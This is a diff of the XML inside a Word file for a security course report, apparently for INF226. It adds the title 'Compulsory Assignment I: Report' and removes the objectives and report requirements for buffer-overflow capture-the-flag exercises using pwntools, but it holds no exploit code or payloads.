 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Title"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="40"/>
+        </w:rPr>
+        <w:t>Compulsory Assignment I: Report</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -14,6 +46,7 @@
           <w:kern w:val="36"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
+          <w:u w:val="single"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -26,702 +59,10 @@
           <w:kern w:val="36"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Objectives</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>You should be able to explain</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">how </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
           <w:u w:val="single"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>buffer overflow attacks</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> work</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">how </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>the computer knows which code to run</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">how </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>function calls</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> work</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">how </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>code and data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> for a program is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>represented on disk and in memory</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>And be able to</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">identify </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>data on a stack frame</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">find </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>memory addresses</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> of </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>code/data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>symbols</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">use </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:highlight w:val="lightGray"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>pwntools</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to connect and communicate with a program, locally or on a network</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">have a rough idea on how to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:u w:val="single"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>mitigate/prevent buffer overflow attacks</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>For each exercise, include</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:val="nb-NO"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Short description of vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Source code showing how to exploit the vulnerability</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">e.g. Python script showing exploit through </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:highlight w:val="lightGray"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>pwntools</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Description of how the exploit works/what it does</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Can be in the form of comments</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>The flag retrieve from the server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="3"/>
-        </w:numPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:textAlignment w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">It'll be a string on the form </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:highlight w:val="lightGray"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>INF226{...}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
